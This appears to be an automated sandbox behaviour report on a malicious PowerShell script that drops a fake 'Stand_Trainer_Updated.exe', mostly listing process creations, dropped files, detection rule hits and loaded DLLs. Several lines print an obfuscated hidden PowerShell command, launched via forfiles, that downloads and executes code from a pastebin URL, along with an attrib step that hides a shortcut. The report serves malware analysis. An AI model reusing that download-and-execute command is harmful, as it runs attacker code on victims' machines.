Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC6407521_2_00007FFAAC640752
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC63F9A61_2_00007FFAAC63F9A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC64BCF31_2_00007FFAAC64BCF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC6410FA1_2_00007FFAAC6410FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC6411D31_2_00007FFAAC6411D3
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FFB226527206_2_00007FFB22652720
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FFAAC661A486_2_00007FFAAC661A48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC66C71212_2_00007FFAAC66C712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC66B96612_2_00007FFAAC66B966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC66D1B112_2_00007FFAAC66D1B1
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Backend.dll 05FF6FB5A27E37AAB0269106830A0E1A56C709428AB130BBDDEFF737452E6FE3
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe E87B1FCB789B6957B5C99A1393738E928D3918F1E46DB20F761D57AD015AA385
Source: Stand_Trainer_Updated.exe.1.drStatic PE information: No import functions for PE file found
Source: amsi64_7548.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7912.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7912, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal96.troj.expl.evad.winPS1@23/27@3/4
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FFB22652010 CreateToolhelp32Snapshot,Process32First,strcmp,Process32Next,6_2_00007FFB22652010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3yvnkqr.fyx.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe "C:\Users\user~1\AppData\Local\Temp\Stand_Trainer_Updated.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe "C:\Users\user~1\AppData\Local\Temp\Stand_Trainer_Updated.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
